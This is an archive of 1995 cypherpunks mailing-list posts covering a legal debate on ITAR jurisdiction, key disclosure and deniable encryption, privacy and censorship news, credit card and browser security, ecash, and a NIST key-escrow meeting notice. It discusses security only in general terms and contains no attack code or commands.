If there are other grounds to prosecute, the court will use those and avoid the constitutional problem. If the foreigner isn't really foreign, then he's not a foreigner. I'm going to respond in detail anyway because I think that the FUD factor may be coming in to play... > > For example, the defendant might be French, and the French government > might be cheering the United States government on. If the crime is a > crime under both French law and the law of the United States then > there is going to be no problem with the United States asserting > jurisdiction. (That is, if I understand it correctly, Mr. Froomkin's > murder example.) I don't see what dual criminality has to do with this. Am I supposed to be on notice that if I do an illegal thing here to my neighbor, I'm supposed to be at risk of prosecution in Sri Lanka? Anyway, recall that in the original hypo foreigner A is talking *legally* to foreigner B. Even if they are not, it's not within the competence of the US government to do anything about it. Nor -- I have to say this over and over and over and over -- has the US government ever asserted in any form that it would seek to do anything about this. Just because an over-literal reading of a regulation could lead to that view does not equal an actual assertion of jurisdiction by the government. > > Or the defendant may have studied cryptography in the United States, > before he returned home and disclosed the information. > Not relevant. Note, by the way, that on these facts the "export" was by the (us person?) who taught the foreigner crypto in the US, not later. > Or the information that he disclosed had previously been unlawfully > exported from the United States in violation of the ITAR (PGP, for > example). Not relevant. > > Or the foreign person is an employee of a United States company or a > foreign company doing business in the United States. 
>

Not a foreigner, or the export is traced to a non-foreigner who then is the one charged with the ITAR violation.

> Or even that the disclosure was done by a message transmitted over the
> Internet that happened to be routed through the United States.

So what? The people are still outside the US.

>
> But the matter is even more simple than that since the government is
> not going to bring those criminal charges against a foreign person or
> a United States person or anyone else if they can possibly avoid it.
> The ITAR's provisions on cryptographic software are used by the
> government to spread fear, uncertainty, and doubt, and to discourage
> the spread of strong cryptography. Since an actual criminal case
> would almost certainly result in at least significant parts of those
> provisions being held unconstitutional, the government is not going to
> bring such a case if it can find any other ways of satisfying its
> goal.
>
> And looked at that way, our foreign person who discloses cryptographic
> software to one or more other foreign persons abroad is going to be
> the perfect fall guy. As I have suggested before, the government will
> simply bar him from getting a visa to enter the United States since
> violation of United States foreign trade regulations is a ground for
> denying a visa--at least an immigrant's visa. And, despite Mr.
> Froomkin's claim that our foreign person would have a cause of action
> if his ``petition'' were denied, he would probably have no recourse
> whatsoever. Certainly he would have no claim that the United States
> has no jurisdiction to exclude him for acts done by him outside the
> United States; the United States has jurisdiction to exclude
> foreigners for things that the foreigners did outside the United
> States, like believing in polygamy. And a foreign person outside the
> United States may not have standing to complain of violations of his
> freedom of speech outside the United States in an American court.
>

I invite you to consider the recent decision of the 9th circuit that foreigners in the US have full 1st Am. rights. Of course, the position of the would-be entrant is not the same as the position of even the temporary visitor to our shores, since constitutional rights don't attach to foreigners until they are in the country, but the language of that case is very suggestive.

> But let us assume, contra-factually that Mr. Froomkin is right, and
> that the poor, excluded foreign person would have a good cause of
> action to force the government to give him a visa. (Though I really
> am curious as to what that action would be.) That cause of action is
> going to cost tens of thousands of dollars to pursue, and it will take
> years before it is resolved in favour of our foreign person, who will
> be excluded--or sitting in jail with a bunch of Cuban and Chinese
> refugees--until the case is resolved in his failure.

Yes, litigation is expensive. The foreign person unjustly excluded on this hypo will spend the time at home, writing crypto for profit, and reducing our tax base. Meanwhile academic lawyers such as us will be representing her free of charge. The government is sometimes unjust; even when you win against it you are worse off often than if you hadn't had to fight. That's a wholly different issue from whether you win in court, which is what I thought we were arguing about.

>
> I am sorry to have written such a long message, and to have been so
> slow in writing it, but I think that part of the problem is that both
> Mr. Froomkin and I were shooting from the hip, and that is why our
> disagreement grew.
>
> But perhaps it has all been worthwhile, for I do think that there are
> a few useful conclusions that can be drawn from this discussion:
>
> (i) We academic lawyers tend to try to settle real world questions
> as if they were academic questions;

Speak for yourself please. I do not accept this accusation.
I assert that my "solution" to the "problem" of whether a court would
allow a criminal prosecution of a foreigner, however "evil", for
discussing crypto with another foreigner in a foreign locale absent the
most explicit and direct instructions from Congress is the correct one:
probability near zero. Direct, clear instructions from Congress
supported by a legislative history or legislative findings that made it
clear that this was a result Congress intended would raise the
probability considerably, but I'd still bet on the court striking the
statute down as violating due process.

The academy is part of the real world. All so-called real world
questions are fit subjects for academic study. Much of my work is
inspired by concrete problems, or is (I hope) applicable to them. Some
of my work is more abstract. The applications are less immediate. I'm
proud of that too.

>
> (ii) It is never safe to assume that any court will construe a
> statute or a regulation as meaning something other than what it
> says;

It is at least as dangerous to believe that a court will
formalistically apply text as if statutory construction, especially in
the shadow of the constitution, were a mechanistic process.

>
> (iii) One can only construe a legal text in a particular context;
> even if one thinks that one can figure out how any court would
> interpret the text in question, one still needs to know how the text
> got before the court; and

This is a fair point. The facts *do* matter. This is why "hard cases
make bad law."

>
> (iv) The fact that you can always sue the police for unconstitutional
> harassment isn't of much help when they reach for the rubber hose.

But the fact that you can do so is part of the reason why rubber hoses
are less common than they would otherwise be.

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law |
U. Miami School of Law     | froomkin at law.miami.edu
P.O. Box 248087            | http://www.law.miami.edu/~froomkin
Coral Gables, FL 33124 USA | It's warm here.

From viking at pacifier.com Fri Nov 17 14:56:57 1995
From: viking at pacifier.com (Robert East)
Date: Sat, 18 Nov 1995 06:56:57 +0800
Subject: COE Recommendation No. R (95) 13
Message-ID:

>>MS> However, if I have a wall safe and
>>MS> they get a warrant to search it, can I be jailed for contempt if I
>>MS> don't give them the combination?
>>
>> Well, IANAL, but yes, I believe that you can be. Or, worse,
>>obstruction of justice. Especially if they cut it open and find that
>>the knife was in the safe.
>
>So presumably the same would apply to the password that unlocks my
>PGP private key. But there's an interesting twist. Once they open
>up the wall safe, they can see for sure what is and isn't in it. This
>ain't necessarily so for an encrypted file. Suppose my software has the
>fiendish sophistication to disgorge different keys depending on what
>password was given, and different pieces of cleartext depending
>on what key was used. (Again, I apologize if this notion has already
>been extensively discussed.) Is there a way to set it up such that
>the cops couldn't be sure -- even using a logic analyzer -- that I
>hadn't given them the complete set of keys, so as to read all the
>cleartexts in the file? Assume that cyphertext files are guaranteed
>to be larger, by some random factor, than the sum of all the cleartexts
>in them, so the mere fact that a smaller quantity of cleartext was
>disgorged than cyphertext supplied would tell them nothing. I guess this
>is a kind of steganography, isn't it? Or at least something similar --
>the point would be that they couldn't tell genuine cyphertext from
>camouflaging noise, without the key that tells them where to look.
>
>Which brings us, in turn, to the bottom line: the only things we
>can be certain the bad guys _won't_ do, are the things they _can't_
>do.
>
>
>--Michael Smith

The interesting thing about PGP is that any incriminating cypher text
one might have on his or her hard disk would, most likely, be in
someone else's public key. So, even if they had your secret key the
only thing that could be uncovered would be cyphertext that someone
else had written to you. Granted, that this could be incriminating but,
then again, not necessarily. I'm sure that for the purposes of
conducting a criminal investigation, your own cyphertext would be far
more incriminating than someone else's. (The above is only true unless
you use the single key encryption option offered for personal files in
which case your files would be readable.)

What one should be more concerned with is sloppy handling of plain text
files used prior to encryption. A good example of that is if you're
using Windows based applications such as MS Winword. It has an
auto-store function that generates a "Temp" file. Such files aren't
wiped in the same fashion that PGP uses when it wipes a text file prior
to encryption.

I think that the paramount thing to consider is if you have something
to hide then it is best to store it inside your head. Any computer
based storage system is bound to have certain limitations that may be
bridged by a determined government agency. The other alternative is to
ensure that potentially incriminating files be purged regularly to
avoid such potential problems.

Robert East
viking at pacifier.com

From jcobb at ahcbsd1.ovnet.com Fri Nov 17 15:37:15 1995
From: jcobb at ahcbsd1.ovnet.com (James M. Cobb)
Date: Sat, 18 Nov 1995 07:37:15 +0800
Subject: No Privacy Right in UK ?
In-Reply-To: <199511172025.PAA13462@jekyll.piermont.com>
Message-ID:

Perry,

Thanks for your inquiry. The post "No Privacy Right in UK ?" is closely
related to cryptography in at least three ways.

(1) Cryptography is a means to accomplish an end: privacy.
That's why the epigraph

Cypherpunks assume privacy is a good thing and wish there were more of
it

heads up the post, "No Privacy Right in UK ?"

(2) Farther, the case discussed in the post was a prosaic example of
invasion of privacy by deception.

That the case is ordinary, and therefore liable to be lost sight of,
makes it all the more significant that the largest London daily
publicized it; and did so in a sympathetic manner.

That helps us here in the United States to propagate the importance of
the right to privacy. Cypherpunks --poetic defenders of privacy (see
the epigraph)-- can reciprocate the favor by bringing it to people's
attention.

Cryptography is not the only means of reversing deceptive invasions of
privacy. But it is peculiarly suitable for reversing some such
invasions because it uses deception to ensure, rather than invade,
privacy. Thus it can provide a model for the so-called prosaic cases:
the sting. For the sting also is designed to deceive deceivers,
criminal or otherwise.

Privacy is, in part, protection from victimization.

(3) Further, Clinton attended an elite university in the UK. Can you
imagine what notions he may have found attractive there? Notions that
can be "encoded" to make them attractive to us here in the States;
then, if we buy into them, can be "decoded" and...applied!

Cordially,

Jim

INCLOSURE:

On Fri, 17 Nov 1995, Perry E. Metzger wrote:

Could you please explain what this has to do with cryptography?

"James M. Cobb" writes:

11 16 95 The Electronic Telegraph runs a newsstory headed

Doorstep polish researcher was whiplash injuries spy

From jya at pipeline.com Fri Nov 17 15:39:08 1995
From: jya at pipeline.com (John Young)
Date: Sat, 18 Nov 1995 07:39:08 +0800
Subject: Corrections about Bob Noyce and Intel
Message-ID: <199511172211.RAA12522@pipe3.nyc.pipeline.com>

Worth magazine of Dec/Jan has a lubricious article on "The Super
Investors of Silicon Valley":

" 'Rise of the Silicon Patriots,' by Donald Katz.
If their egos and paychecks are oversized, so is their impact on the
economy and culture. It's not for nothing that California's venture
capitalists think they're at the center of the universe."

It traces some of the mauling by rapacious VC tigers of unwary
techno-bambis and gleefully vaunts winner-take-all when the chips are
down (multiple puns there) -- commensurate with the flatulent
flattering flummoxing of this "financial intelligence" oilslicker.

For more FFF FinInt organ-grinding the monkeys, see "Downloading Warren
Buffet's Brain."

From hallam at w3.org Fri Nov 17 15:42:01 1995
From: hallam at w3.org (hallam at w3.org)
Date: Sat, 18 Nov 1995 07:42:01 +0800
Subject: COE Recommendation No. R (95) 13
In-Reply-To:
Message-ID: <9511172249.AA09569@zorch.w3.org>

>sorry, but there is a right to remain silent in Europe:

Pity the British Tories do not understand that. Because they brought in
the stupid "right of the prosecution to bring attention to the
defendant's refusal to answer questions" it probably means that a very
large number of current prosecutions will get sent down in about three
years time. Guess the cost of that!

It was only done because they had nothing else to spout at their
conference. My father (who is a conservative and whose cousin was
chairman of the party until recently) said he felt sick when he saw the
conference on TV. Three strikes and you are out type stuff...

Actually there is a set of crimes relating to fraud where there is a
specific crime of refusal to answer interrogation. They messed this one
up as well. Rather than phrase it that the trustees of a fund have a
duty to account for the whereabouts of the funds at all times when
asked they simply removed the right to silence. Since trustees take on
a position voluntarily I don't see the same problems in requiring them
to perform certain duties (which involve disclosure) as removing their
right to silence.
I don't think that the right to remain silent would be read in the
manner asserted however. It is a question of refusal to provide
material evidence rather than a refusal to testify.

Phill

From jcobb at ahcbsd1.ovnet.com Fri Nov 17 15:51:24 1995
From: jcobb at ahcbsd1.ovnet.com (James M. Cobb)
Date: Sat, 18 Nov 1995 07:51:24 +0800
Subject: No Privacy Right in Indonesia ?
Message-ID:

Cypherpunks assume privacy is a good thing and wish there were more of
it.
--Welcome to cypherpunks

Friend,

An 11 17 95 Reuter Information Service newsstory headlined

Politics, not sex, is Indonesian Internet's concern

reports that

In Indonesia, the quiet Internet revolution has not gone unnoticed by
the armed forces.

Here are more excerpts from the newsstory:

Armed forces spokesman Brigadier-General Surwarno Adiwijoyo told
Reuters the military had suggested to the communications ministry the
need for some sort of "toll gate" to "black out" news which could
damage culture or affect security. It has also suggested registering
uses and users, he said.

...nobody doubts the military is watching.

Activists in Indonesia who use the Internet say it is a powerful tool
for distributing information in a society where self-censorship
abounds, newspapers are tightly controlled, journalists are jailed and
unlicensed magazines banned.

Internet users doubt the Indonesian government can legislate or control
the Internet, short of pulling the plug on the nation's
soon-to-be-privatised phone system.

Please note that the expression "legislate or control" means control by
either fraud or force, whichever the military finds most convenient.

If the military does one day pull the plug, will that validate or
invalidate the statement in the "Welcome to cypherpunks" document--

Cypherpunks know that a widely dispersed system can't be shut down.
A tangential answer is supplied by Indonesian activists:

Despite the technical and administrative hurdles with censoring an
increasingly large volume and web of contacts, Internet users point out
such a scheme [of censorship, not plug-pulling] would not stop the
increasing distribution of material within the country.

For there are private as well as commercial networks in the country.

Commercial providers' estimates suggest there are around 10,000
registered local users, with popularity of the Internet growing among
Indonesia's technological and educated elite....

Please note the expression "registered local users," and recall the
military's

suggested registering [of] uses and users

Uses? Perhaps that means those nominally private networks.

Cypherpunks hope that all people desiring privacy will learn how best
to defend it.
--Welcome to cypherpunks

Cordially,

Jim

NOTE. NandO News, which posted the above newsstory, can be accessed at:

http://www.nando.net

The story's online filename is: info733_8.html

It's datelined: JAKARTA (Nov 16, 1995 - 01:06 EST)

From anonymous-remailer at shell.portal.com Fri Nov 17 15:57:19 1995
From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com)
Date: Sat, 18 Nov 1995 07:57:19 +0800
Subject: credit card conventional wisdom
Message-ID: <199511172312.PAA22826@jobe.shell.portal.com>

Alice here ...

On Wed, 15 Nov 1995, Howard Melman wrote:

> Vladimir Z. Nuri wrote:
> > attempts to get secure credit card number transfer on the internet are
> > not an end in themselves. they are the first steps toward an entirely
> > new transaction system. those who see a single step and criticize it
> > as feeble in the context of past systems are missing the point and
> > apparently can't think past the present nanosecond of their lives.

My grandfather used to say, that the first horse to break from the
gate, isn't necessarily the first to cross the finish line. Often,
he'll be pulling up the rear.
> You'll have a hard convincing folks that they need something
> better than what works perfectly well today.

In my humble opinion, the present system can't really be characterized
as "working perfectly well". Far from it.

While not as familiar with the US system as the Canadian, I can give as
a simple example, the bank clearing system for paper checks. In Canada,
we can clear a check from one side of the country to the other
overnight. We have 24 hour clearing. While this is far from "perfect",
our existing paper systems allow for a degree of efficiency which I
don't believe is engineered into the US clearing system.

Perhaps someone can correct me, if I have erred but I think it takes
far longer than 24 hours to clear a check drawn on any US bank, and
deposited to any other bank's credit in the United States. It may work
"functionally" ... but certainly far from "perfectly" nor
"efficiently".

> Here's another point that I didn't see in your list. Today it might be
> just as safe to send your CC# over the internet as giving it to a clerk,
> etc. This is mostly because the number of CC#'s sent over the net vs
> the whole traffic is small. It is therefore not very cost effective to
> try to steal credit card numbers over the net vs other means (searching
> through dumpsters, taping a phone line near LL Bean, etc.).

A very good point. But then, dumpster-diving attacks could be moderated
by simply implementing carbonless forms. No carbon, reduces a lot of
the risks. It's basic risk management.

All of this becomes a part of the cost/benefit analysis, and is part of
the function of security policy.

It's very much like all the talk on another thread on this list about
Java security. There is no point in even discussing Java security in
Netscape, when Netscape PRESENTLY has existing security holes written
into the very fabric of the existing installed codebase. Holes which
Netscape and AT&T refuse to address, correct or even comment on.
Sun's security approach misses the point. Putting dead-bolts on houses
while leaving all of the windows open, just doesn't address the
problem. It really misses the mark.

> If CC# purchases became common over the net, it would become much more
> valuable to try to steal them from the net and more people would. It
> would then become much less secure, not for any technical reason but
> because there will be more crooks exploiting the existing flaws.

This is also unfortunately true. Information on how to "break" a system
does propagate. As more people know how to exploit a system, or as more
people learn how to utilize the "letter of the rules" (the "code")
rather than the "spirit" (the "intent") the degree of exploitation
grows.

Ask any executive in the Gaming Industry about this. Black-Jack
card-counting went through an evolution in exactly this fashion. Many
casinos lost a veritable "fortune" to good card counters. They lost to
organized "teams" of card counters. Counters who literally broke the
bank.

Systems always have exploitable features. And new systems will always
present new opportunities for exploitation. A completely new set of
risks which are additive to those already in place, even those which
may not yet be in a state of active exploitation.

A pertinent network example: credit card numbers.

Credit card numbers are not just a set of random digits. Only
particular patterns of numbers can be valid. This existing "security
provision" -- check digits -- actually ends up opening a security hole
when we look at transmitting credit card numbers via the Internet. The
security feature on one side of the ledger makes it far easier to
differentiate between what is a random set of numbers, and what is in
fact a valid CC number. Simple pattern analysis allows to search for
valid numbers. It makes the potential "crook's" job much easier and
it's already engineered into the system.
The "credit card number" risk though is accidental, while the Netscape
Navigator risk isn't accidental at all, it's willful.

Alice de 'nonymous ...

...just another one of those...
...hunters...

P.S. This post is in the public domain.

C. S. U. M. O. C. L. U. N. E.

From anonymous-remailer at shell.portal.com Fri Nov 17 16:04:27 1995
From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com)
Date: Sat, 18 Nov 1995 08:04:27 +0800
Subject: credit card conventional wisdom
Message-ID: <199511172322.PAA23877@jobe.shell.portal.com>

Alice here ...

On Thu, 16 Nov 1995, Vladimir Z. Nuri wrote:

> but one distinction I do realize has to be made in all this is the
> difference between "fraud" and "breaking a system". the latter is
> a far more potentially serious problem with cryptographic security than
> the former. in fact cryptographic security attempts to deal with all
> fraud by making "breaking the system" impossible, and succeeds to the
> degree it accomplishes this.

I think this is extremely important to consider. The functions which
define relationships between large numbers of variables, (such as say
the world economy) -- these functions are not "idiot proof". They can
collapse. And, yes Virginia, the system can be "broken".

To suggest that cryptography can address this issue is to misunderstand
the problem, and is part of this whole mindset that "security" is
cryptography.

Our economies are, if anything, less resilient than they were in the
not too distant past. They are far more vulnerable. The introduction of
new business practices, such as the reduction in most firms'
inventories, and the ever greater reliance on "just in time" approaches
has made us far less able to sustain any interruption.

The headlong introduction of "new variables" and new vectors into an
unstable system has never been "sound policy". I guess it's sort of
like what happened when rabbits were introduced into Australia. An
eco-catastrophe.
Perhaps, we can all agree that existing systems are best "not
destabilized". Then again, I'm not the one who gets his jollies by
rocking the boat. I get mine elsewhere.

I guess here then is the real question, what is the fallback plan when
something does go catastrophically wrong?? What then, hand-wringing,
and saying that it "exceeded our theoreticians predictive capabilities"
just does not suffice.

Alice de 'nonymous ...

...just another one of those...
...hunters...

P.S. This post is in the public domain.

C. S. U. M. O. C. L. U. N. E.

From perry at piermont.com Fri Nov 17 16:04:51 1995
From: perry at piermont.com (Perry E. Metzger)
Date: Sat, 18 Nov 1995 08:04:51 +0800
Subject: No Privacy Right in UK ?
In-Reply-To:
Message-ID: <199511172316.SAA13692@jekyll.piermont.com>

"James M. Cobb" writes:
> Thanks for your inquiry. The post "No Privacy Right in UK ?"
> is closely related to cryptography in at least three ways.

Actually, I was being rhetorical. It was an inappropriate posting.

> Cryptography is a means to accomplish an end: privacy.

That's true, but it isn't a means to keep private investigators from
noticing that insurance cheats are perfectly healthy when they claim to
be horribly incapacitated, which was what the article was about.

> Farther, the case discussed in the post was a prosaic example
> of invasion of privacy by deception.

Actually, it was a prosaic example of the lengths to which human
stupidity is taken in our court systems. I'm reminded of the rule that
says you can't put a boobytrap in your home -- after all, a person
breaking and entering could injure themselves with it. It has nothing
to do with cryptography, though.

> Further, Clinton attended an elite university in the UK. Can you
> imagine what notions he may have found attractive there?

So what. Nothing to do with cryptography.

Take this elsewhere, I say.
Perry

From edge at got.net Fri Nov 17 16:13:28 1995
From: edge at got.net (Jay Campbell)
Date: Sat, 18 Nov 1995 08:13:28 +0800
Subject: COMMUNITY CONNEXION BECOMES FIRST INTERNET PROVIDER TO ACCEPT ECASH
Message-ID: <199511172357.PAA03710@you.got.net>

>COMMUNITY CONNEXION BECOMES FIRST INTERNET PROVIDER TO ACCEPT ECASH
>
>Community ConneXion today announced that it has become the first and
>only Internet Service Provider in the world to allow for payment using
>ecash, a digital cash system developed by DigiCash bv, of Amsterdam,

And, er, we're second. Ditch that 'only' part :)

--
Jay Campbell edge at got.net - Operations Manager -=-=-=-=-=-=-
Sense Networking, Santa Cruz Node Jay at Campbell.net got.net?
PGP MIT KeyID 0xACAE1A89
"On the Information Superhighway, I'm the guy behind you in this
morning's traffic jam leaning on his horn."

From anonymous-remailer at shell.portal.com Fri Nov 17 16:36:19 1995
From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com)
Date: Sat, 18 Nov 1995 08:36:19 +0800
Subject: NSA, ITAR, NCSA and plug-in hooks.
Message-ID: <199511180014.QAA29549@jobe.shell.portal.com>

On Wed, 15 Nov 1995, Bill Stewart wrote:

> >>Does anyone know the ostensible justification for this?
>
> Isn't the NCSA government-funded? If so, they've probably got
> less slack in what they can get away with than private citizens;

I think that government-funding does give a certain degree of control
-- the control that comes with the budget axe.

Private citizens alternatively, get to face a different type of tool.
They get to face stuff like RICO provisions, which "effectively" -- as
they are presently used, rather than as they were written and intended
to be used -- tend to allow the government to "influence" private
citizens.

> the NSA's got more leverage over their funding, especially if
> "Supercomputer Applications" are often military or civilian-govt.

I doubt that the NSA approves the NCSA's budget.
Far more likely would be for the NSA to use a rogue programmer at the
NCSA. Someone who might hide some very damaging code into one of the
existing applications without anyone (else) knowing about it. I could
even see an independent doing this simply to profit from it. I could
see someone doing something like that.

It's no different really than the "free" programs that were given away
years ago which appeared to be useful but actually contained "poison
code".

> Not only do they have to worry about ITAR as law, they have to
> worry about their continued cash flow.

Like I said, I don't believe in the "grand conspiracy" model. I tend
toward "contained" enterprises.

All the more reason though, NEVER to use black-box code, and all the
more reason for public open review of code.

NSA and ITAR aside ... safe computing is safe computing and is in
everyone's collective interest.

Alice de 'nonymous ...

...just another one of those...
...hunters...

P.S. This post is in the public domain.

C. S. U. M. O. C. L. U. N. E.

From dlv at bwalk.dm.com Fri Nov 17 17:09:02 1995
From: dlv at bwalk.dm.com (Dr. Dimitri Vulis)
Date: Sat, 18 Nov 1995 09:09:02 +0800
Subject: Java & Netscape security [NOISE]
In-Reply-To: <9511171814.AA23432@alpha>
Message-ID: <4qiqeD22w165w@bwalk.dm.com>

m5 at dev.tivoli.com (Mike McNally) writes:
> Frederick B. Cohen writes:
> > This is baloney. When you work for Netscape or Sun and speak about your
> > company's products, you are representing the company whether you
> > disclaim it or not.
>
> Baloney.

Fred is right. I used to work for Goldman Sachs & their internet usage
policy stated that when you write to Internet or Usenet from a GS
account, it will reflect on the firm no matter how you disclaim it.

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps

From jsw at netscape.com Fri Nov 17 17:22:37 1995
From: jsw at netscape.com (Jeff Weinstein)
Date: Sat, 18 Nov 1995 09:22:37 +0800
Subject: Java & Netscape security (reply to misc. postings)
In-Reply-To: <199511161933.LAA18504@netcom20.netcom.com>
Message-ID: <30ABB66D.3492@netscape.com>

Dr. Frederick B. Cohen wrote:

[ quoted comments from mrm at netcom.com (Marianne Mueller) removed ]

> It seems clear from this that Netscape, or at least Marianne who seems
> to speak for Netscape, doesn't understand the protection issues that my
> clients face. I will nevertheless forward this official Netscape line
> to them so they can better understand why I tell them it is insecure.

Ahem. mrm at netcom.com is not a Netscape employee. netcom.com is not
the same as netscape.com. Marianne is a Sun employee, who is working on
Java.

--Jeff

--
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw at netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.

From stewarts at ix.netcom.com Fri Nov 17 17:30:24 1995
From: stewarts at ix.netcom.com (Bill Stewart)
Date: Sat, 18 Nov 1995 09:30:24 +0800
Subject: No Privacy Right in Indonesia ?
Message-ID: <199511180111.RAA12769@ix6.ix.netcom.com>

At 05:54 PM 11/17/95 -0500, "James M. Cobb" wrote:
>An 11 17 95 Reuter Information Service newsstory headlined
> Politics, not sex, is Indonesian Internet's concern
...
> Activists in Indonesia who use the Internet say it is a powerful
> tool for distributing information in a society where self-censorship
> abounds, newspapers are tightly controlled, journalists
> are jailed and unlicensed magazines banned.

The primary difference between Indonesian and Singaporean censorship is
that the Singaporeans are a lot more urbane about it, and generally
don't have crowds of protestors to shoot at.
Reporting on the East Timor activity is an especially good way to get
kicked out of the country; I know people it's happened to.
Uncensorable communications can be a substantial help, though
rubber-hose cryptanalysis is still fairly effective, and it's the type
of place that would use it.

A certain amount of US activism on the East Timor problems is
Internet-based; I don't know how connected it is to Indonesia or East
Timor, which is too underdeveloped to be very active on the net, and
has the added problem that activists are heavily watched.

The Indonesian military recruitment process is unfortunately not
something that crypto can affect much, except by keeping political
activists' identities private so they're not targets. Basically, the
draft board knocks on your door and says "Uncle wants _you_", and
they're authorized to shoot you if you don't cooperate, though they're
also authorized to not shoot you.

#--
# Thanks; Bill
# Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com
# Phone +1-510-247-0663 Pager/Voicemail 1-408-787-1281

From ddt at lsd.com Fri Nov 17 17:31:27 1995
From: ddt at lsd.com (Dave Del Torto)
Date: Sat, 18 Nov 1995 09:31:27 +0800
Subject: [BOOK] "SPYWORLD" (was: Re: CSE gets flak on TV)
Message-ID:

In Reply to the Message wherein it was written:

>On Tue, 14 Nov 1995 s1113645 at tesla.cc.uottawa.ca wrote:
>
>> Electronic snooping part of the game
>>
>> OTTAWA (CP)--Intelligence experts say it's no big secret that Canada's
>> high-tech spy agency snoops on friendly countries for financial gain.
>
>No big secret?? It was news to me. ;-)

[elided]

Dear Alice,

To the few on the list who have not already had the pleasure, I'd put
"SPYWORLD" in the "Puzzle Palace" category of must-reads.
Before recently leaving our own Wunderland for a course in advanced
bird-watching off in the Canary Islands, Michael Sattler was kind
enough to loan me his hardcover of this pithy little 1994
history/expose on the Canadian spook community by one of their first
key propeller-heads, "Mike Frost." After being unceremoniously dumped
by the Canucks a few years back, he decided to "share" about it all to
work out his frustrations.

Though I assume it was 'tidied up' by various government censors in
pre-publication, and according to the inside page was printed and
"bound in the U.S.A." ;), I must say it was nevertheless an arousing
read, albeit a bit nit-sloppy with the ghost writing/editing here and
there.

It paints a colorful picture of the TLA gang-bang that resulted in the
conception of the Canadian black budget intercept operations. The
potent schtuppingvermachen of the American and British, each waiting
patiently for sloppy seconds is, to say the least, pruriently
fascinating. "Frost" manages to (un)cover, in pleasurably lurid detail,
some of the tools used, and policies openly violated, during such
intercepts as "Stephanie" in Moscow. There are even some descriptions
of the scenes behind the green doors of the NSA and CIA. Frankly, all
it really lacks is a nude picture of the American Ambassador in Ottawa
pulling his pants up _before_ drawing the shades for the last time.

If you do read it, use protection. ;)

"SPYWORLD"
Subtitle: Inside the Canadian and American Intelligence Establishments
By: "Mike Frost" as told to Michel Gratton
ISBN 0-385-25494-6
Publisher: Doubleday Canada Ltd.
105 Bond Street
Toronto, Ontario M5B 1Y3

dave

PS: Don't worry, Mike, none of the pages stick together. :)

_______________________________________________________________________
"If you're ever robbed of your virtue, trust me: it was an inside job."
From cme at TIS.COM Fri Nov 17 17:51:46 1995 From: cme at TIS.COM (Carl Ellison) Date: Sat, 18 Nov 1995 09:51:46 +0800 Subject: Dec 5th KE meeting details Message-ID: <9511172033.AA09548@tis.com> Date: Mon, 13 Nov 1995 13:15:32 -0500 From: Elaine Frye November 8, 1995 To: Key Escrow Distribution Lis From: Ed Roback, NIST Subject: Planning for December 5th Meeting At the September 6-7, 1995 key escrow issues meeting, I received a number of comments that the government presentations should have addressed more topics in greater detail. To respond to this concern, I would like to request submissions of any specific questions/issues related to the draft criteria that you would like to see addressed on December 5th. I cannot guarantee we can meet all requests, but your suggestions will greatly help in planning the meeting agenda and government presentations. Please forward your questions/issues/ideas to me via e-mail at "edward.roback at nist.gov", fax at 301-948-1784 or telephone on 301-975-3696. FYI, the current outline for the December 5 meeting is as follows: A. Government presentation of draft criteria, followed by Q&As B. Industry presentations on draft criteria C. Breakout sessions on criteria (a suggestion has been made to also have one on policy issues) D. Reports from breakout sessions E. Wrapup Remember, also, that if you would like to make a presentation at the meeting, you are asked to contact Elaine Frye at "elaine.frye at nist.gov". You may also bring written comments to the meeting for distribution (our estimate is that 250 copies are necessary.) Thank you. ***************************************************** Elaine Frye Computer Systems Laboratory, NIST Bldg. 
225/Rm.B154
Gaithersburg, MD 20899-0001
Voice: 301/975-2819
Fax: 301/948-1784
*****************************************************

From wiltship at iccu6.ipswich.gil.com.au Fri Nov 17 18:11:54 1995
From: wiltship at iccu6.ipswich.gil.com.au (PeterWiltshire)
Date: Sat, 18 Nov 1995 10:11:54 +0800
Subject: credit card conventional wisdom
Message-ID: <199511180157.MAA13155@iccu6.ipswich.gil.com.au>

You wrote...

>While not as familiar with the US system as the Canadian, I can give as a
>simple example, the bank clearing system for paper checks. In Canada, we
>can clear a check from one side of the country to the other overnight. We
>have 24 hour clearing. While this is far from "perfect", our existing
>paper systems allow for a degree of efficiency which I don't believe is
>engineered into the US clearing system.

Here in Australia most banks take 5 working days to clear a cheque.. even if it's deposited at a bank just up the road from drawer's bank.

cheers
Peter

Flight to Quality
Wiltshire Productions Pty Ltd
Brisbane, Queensland, Australia
Intl Voice 61 7 3376 3535
Intl Fax 61 7 3279 4027
Email wiltship at gil.com.au
PGP Key ID 3E584C7D
PGP Fingerprint 01 03 FB F4 BE F8 2B F3 5D 84 6B 69 37 80 FE 10

From ahupp at primenet.com Fri Nov 17 19:43:12 1995
From: ahupp at primenet.com (Adam Hupp)
Date: Sat, 18 Nov 1995 11:43:12 +0800
Subject: NSA, ITAR, NCSA and plug-in hooks.
Message-ID: <199511180319.UAA07399@usr5.primenet.com>

>From: Scott Brickner
>Date: Thu, 16 Nov 1995 15:13:27 -0600
>Subject: Re: NSA, ITAR, NCSA and plug-in hooks.
>The problem is that the non-encryption program must use the same
>interface as the encryption program. Text compression is often cited
>as an example of a non-encryption program that can use the same hooks
>as a compression program, but there's a key difference: the text
>compressor *doesn't* need a key.
>
>The encryption tool would have an interface like
>    Boolean (*)( DataSource, DataSink, void*);
>
>A compressor written to the same interface would never need to touch
>that third argument. Therefore, the second argument is "specifically
>designed" to permit an encryption tool to be used.
>
>You'd need a program which not only *accepted* the additional parameter,
>but also *needed* the second parameter. I confess I have some difficulty
>thinking of one.
>

PKZIP allows encryption (others?). How about a hook to that?

_____________________________________________________________
"We work in the dark
We do what we can
We give what we have
Our doubt is our passion
And our passion is our task
The rest is the madness of art."
--Henry James
___________________________________________________________

From welcome at realaudio.com Fri Nov 17 19:48:47 1995
From: welcome at realaudio.com (RealAudio Welcome Wagon)
Date: Sat, 18 Nov 1995 11:48:47 +0800
Subject: RealAudio website TEMPORARY PASSWORD
Message-ID: <199511180309.TAA07665@www.realaudio.com>

